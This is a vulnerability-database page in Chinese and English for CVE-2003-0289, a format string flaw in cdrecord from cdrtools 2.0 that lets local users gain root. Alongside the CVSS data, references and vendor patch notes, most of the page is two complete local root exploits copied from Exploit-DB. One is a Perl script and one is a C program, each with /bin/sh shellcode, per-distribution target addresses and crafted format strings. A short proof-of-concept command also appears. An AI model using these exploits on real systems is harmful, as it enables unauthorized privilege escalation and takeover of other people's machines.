CVE-2003-0289
CVSS7.2
发布时间 :2003-06-16 00:00:00
修订时间 :2016-10-17 22:31:51
NMCOES    

[原文]Format string vulnerability in scsiopen.c of the cdrecord program in cdrtools 2.0 allows local users to gain privileges via format string specifiers in the dev parameter.


[CNNVD]CDRTools CDRecord Devname格式字符串漏洞(CNNVD-200306-084)

        cdrtools 2.0版本中cdrecord程序的scsiopen.c存在格式字符串漏洞。本地用户借助dev参数的格式字符串说明符提升特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cdrtools:cdrecord:2.0
cpe:/a:cdrtools:cdrecord:1.11

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0289
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0289
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-084
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz
(UNKNOWN)  CONFIRM  ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz
http://forums.gentoo.org/viewtopic.php?t=54904
(UNKNOWN)  GENTOO  200305-06
http://marc.info/?l=bugtraq&m=105285564307225&w=2
(UNKNOWN)  BUGTRAQ  20030513 cdrtools2.0 Format String Vulnerability
http://marc.info/?l=bugtraq&m=105286031812533&w=2
(UNKNOWN)  BUGTRAQ  20030513 Cdrecord_local_root_exploit.
http://www.mandriva.com/security/advisories?name=MDKSA-2003:058
(UNKNOWN)  MANDRAKE  MDKSA-2003:058
http://www.securiteam.com/exploits/5ZP0C2AAAC.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5ZP0C2AAAC.html
http://www.securityfocus.com/bid/7565
(VENDOR_ADVISORY)  BID  7565
http://xforce.iss.net/xforce/xfdb/12007
(UNKNOWN)  XF  cdrtools-scsiopen-format-string(12007)

- 漏洞信息

CDRTools CDRecord Devname格式字符串漏洞
高危 格式化字符串
2003-06-16 00:00:00 2005-10-20 00:00:00
本地  
        cdrtools 2.0版本中cdrecord程序的scsiopen.c存在格式字符串漏洞。本地用户借助dev参数的格式字符串说明符提升特权。

- 公告与补丁

        Mandrake has released a security advisory (MDKSA-2003:058-1), updating a previous advisory. Users are advised to upgrade as soon as possible. Further information regarding how to obtain and apply fixes can be found in the attached advisory.
        The vendor has released an update to address this issue:
        CDRTools CDRecord 2.0
        

- 漏洞信息 (31)

CdRecord Version <= 2.0 Mandrake local root exploit (EDBID:31)
linux local
2003-05-14 Verified
0 n/a
N/A [点击下载]
#!/usr/bin/perl
###########################################################
# Cdrecord version 2.0 and < local root exploit.
#
#
#   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
#   Using target number 4
#   Using Mr .dtors 0x808c82c
#   Cdrecord 2.0 (i586-mandrake-linux-gnu)
#
#   scsibus: -1 target: -1 lun: -1
#   Warning: Open by 'devname' is unintentional and not supported.
#   /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver.
#   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
#   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
#   sh-2.05b# id
#   uid=0(root) gid=0(root) groups=503(wsxz)
#   sh-2.05b#
#####################################################

		    $shellcode =
                    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
		    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
		    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
                    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
                    "\xff\xff/bin/sh";

		    $cdrecordpath = "/usr/bin/cdrecord";
		    $nop = "\x90"; # x86 NOP
                    $offset = 0; # Default offset to try.


     if (@ARGV == 1 || @ARGV == 2) {
                    $target = $ARGV[0];
                    $offset = $ARGV[1];
		    }else{
		    printf(" Priv8security.com Cdrecord local root exploit!!\n");
		    printf(" usage: $0 target\n");
		    printf(" List of targets:\n");
		    printf("      1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n");
                    printf("      2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n");
                    printf("      3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
		    printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
		    exit(1);
		    }

     if ( $target eq "1" ) {
                   $retword = 0x0807af38; #Mr  .dtors ;)
		   $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
		    }
     if ( $target eq "2" ) {
                  # $retword = 0x08084578; #.dtors
                   $retword = 0x08084684; #.GOT exit
		   $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
		    }
      if ( $target eq "3" ) {
                   $retword = 0x0807f658;
                   $fmtstring =  "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
		    }
       if ( $target eq "4" ) {
                   $retword = 0x0808c82c; #.GOT exit
		   $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
		    }

		    printf("Using target number %d\n", $target);
                    printf("Using Mr .dtors 0x%x\n",$retword);

		    $new_retword = pack('l', ($retword));
		    $new_retshell = pack('l', ($retshell));
                    $buffer2 = $new_retword;
                    $buffer2 .= $nop x 150;
                    $buffer2 .= $shellcode;
                    $buffer2 .= $fmtstring;

		    exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");


# milw0rm.com [2003-05-14]
		

- 漏洞信息 (22594)

CDRTools CDRecord 1.11/2.0 Devname Format String Vulnerability (EDBID:22594)
linux local
2003-05-13 Verified
0 CMN
N/A [点击下载]
source: http://www.securityfocus.com/bid/7565/info

CDRecord has been reported prone to a format string vulnerability. The issue presents itself due to a programming error that occurs when calling a printf-like function.

It has been reported that by harnessing an unsupported feature of the CDRecord utility, an attacker may supply format string specifiers as the 'dev' argument passed to the vulnerable utility.

This may ultimately result in the execution of attacker-supplied code in the context of the CDRecord utility. It has been reported that CDRecord is installed setUID root on several distributions.

It should be noted that although this vulnerability has been reported to affect CDRecord version 2.0 previous versions might also be affected.

/*
 * cdrecord, readcd, cdda2wav (cdrtools 2.0) exploit by CMN
 *
 * <cmn@darklab.org>/<md0claes@mdstud.chalmers.se>
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#define NOP             0x90
#define BUFSIZE         65536
#define FMTSTRSIZE      512
#define DUMMY           0x204e4d43

static const char linuxcode[] =
    "\xb9\xff\xff\xff\xff" /* movl    $-1, %ecx   */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x31"             /* movb    $0x31, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x46"             /* movb    $0x46, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x32"             /* movb    $0x32, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x47"             /* movb    $0x47, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xd2"             /* xorl    %edx, %edx  */
    "\x52"                 /* pushl   %edx        */
    "\x68\x2f\x2f\x73\x68" /* pushl   $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl   $0x6e69622f */
    "\x89\xe3"             /* movl    %esp, %ebx  */
    "\x52"                 /* pushl   %edx        */
    "\x53"                 /* pushl   %ebx        */
    "\x89\xe1"             /* movl    %esp, %ecx  */
    "\xb0\x0b"             /* movb    $0xb, %al   */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\x40"                 /* inc     %eax        */
    "\xcd\x80";            /* int     $0x80       */

struct vulnfo {
    u_char *bin;
    u_int retloc;
    u_char *stackpop;
    u_int fmt_written;
    u_int pop_written;
    u_char *arg2;
};

static struct vulnfo targets[] =
{
                       /* .dtors */
    {"/usr/bin/cdrecord", 0x0808bf04+4, "%.f%.f%.f%08x%08x%.f%.f%.f%08x", 13, 36, "/bin/sh"},
    {"/usr/bin/readcd", 0x080683a4+4, "%.f%.f%.f%08x%08x%.f%.f%.f%08x", 13, 37, NULL},
    {"/usr/bin/cdda2wav", 0x08082244+4, "%.f%.f%.f%08x%08x%.f%.f%.f%08x", 13, 37, NULL},
};

void
usage(char *pname)
{
    printf("Usage: %s <target> [-l<retloc>] [-r<retaddr>] [-o<offset>]\n", pname);
    printf("Targets: \n");
    printf("       0 - '%s' (Slackware 8.1, cdrtools-2.01a5-i686-1.tgz)\n", targets[0].bin);
    printf("       1 - '%s' (Slackware 8.1, cdrtools-2.01a5-i686-1.tgz)\n", targets[1].bin);
    printf("       2 - '%s' (Slackware 8.1, cdrtools-2.01a5-i686-1.tgz)\n\n", targets[2].bin);
}

int
main(int argc, char *argv[])
{
    u_long ret = (u_long)&ret;
    struct vulnfo *target;
    char buf[FMTSTRSIZE];
    char envbuf[BUFSIZE];
    long offset = 0;
    u_int written;
    char *pt;
    char *av[4];
    char *ev[2];
    int i;
    int tmp;
    int wb;
    int pad;

    printf("\n** cdrecord, readcd, cdda2wav (cdrtools 2.0) exploit by CMN **\n");

    if (argc < 2) {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    i = atoi(argv[1]);

    if ((i>=0) && (i<=2)) {
        target = &targets[i];
    }
    else {
        fprintf(stderr, "Unknown target!\n");
        exit(EXIT_FAILURE);
    }

    argc--;
    argv++;

    while ( (i = getopt(argc, argv, "l:r:o:")) != -1) {
        switch(i) {

            case 'l':
                target->retloc = strtoul(optarg, NULL, 0);
                break;

            case 'r':
                ret = strtoul(optarg, NULL, 0);
                break;

            case 'o':
                offset = strtol(optarg, NULL, 0);
                break;

            default:
                usage(argv[0]);
                exit(EXIT_FAILURE);
                break;
        }
    }

    ret -= offset;
    printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
    printf("Target program: '%s'\n", target->bin);
    printf("Using address 0x%08x, retloc 0x%08x\n", (u_int)ret, target->retloc);
    printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n");
    written = target->fmt_written;

    snprintf(buf, 5, "dev=");
    pt = &buf[4];

    *(u_long *)pt = DUMMY;
    *(u_long *)(pt +4) = target->retloc;
    pt += 8;
    written += 8;


    *(u_long *)pt = DUMMY;
    *(u_long *)(pt +4) = target->retloc+1;
    pt += 8;
    written += 8;

    *(u_long *)pt = DUMMY;
    *(u_long *)(pt +4) = target->retloc+2;
    pt += 8;
    written += 8;

    *(u_long *)pt = DUMMY;
    *(u_long *)(pt +4) = target->retloc+3;
    pt += 8;
    written += 8;

    memcpy(pt, target->stackpop, strlen(target->stackpop));
    pt += strlen(target->stackpop);
    written += target->pop_written;

    for (i=0; i<4; i++) {
        wb = ((u_char *)&ret)[i] + 0x100;
        written %= 0x100;
        pad = (wb - written) % 0x100;

        if (pad < 10)
            pad += 0x100;

        tmp = sprintf(pt, "%%%du%%n", pad);
        written += pad;
        pt += tmp;
    }

    memset(envbuf, NOP, sizeof(envbuf));
    memcpy(&envbuf[BUFSIZE - (sizeof(linuxcode)+24)],
        linuxcode, sizeof(linuxcode));

    av[0] = target->bin;
    av[1] = buf;
    av[2] = target->arg2;
    av[3] = (char *)NULL;

    ev[0] = envbuf;
    ev[1] = (char *)NULL;

    execve(target->bin, av, ev);
    perror("execve()");
    exit(EXIT_FAILURE);
}
		

- 漏洞信息

6794
cdrtools cdrecord scsiopen.c Overflow
Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-05-13 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

CDRTools CDRecord Devname Format String Vulnerability
Input Validation Error 7565
No Yes
2003-05-13 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Stefano Di Paola <st0r1e@libero.it>.

- 受影响的程序版本

CDRTools CDRecord 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
CDRTools CDRecord 1.11
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2

- 漏洞讨论

CDRecord has been reported prone to a format string vulnerability. The issue presents itself due to a programming error that occurs when calling a printf-like function.

It has been reported that by harnessing an unsupported feature of the CDRecord utility, an attacker may supply format string specifiers as the 'dev' argument passed to the vulnerable utility.

This may ultimately result in the execution of attacker-supplied code in the context of the CDRecord utility. It has been reported that CDRecord is installed setUID root on several distributions.

It should be noted that although this vulnerability has been reported to affect CDRecord version 2.0 previous versions might also be affected.

- 漏洞利用

The following proof of concept was supplied, additional exploit 'priv8cdr.pl' supplied by Priv8security.com:

$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

- 解决方案

Mandrake has released a security advisory (MDKSA-2003:058-1), updating a previous advisory. Users are advised to upgrade as soon as possible. Further information regarding how to obtain and apply fixes can be found in the attached advisory.

The vendor has released an update to address this issue:


CDRTools CDRecord 2.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站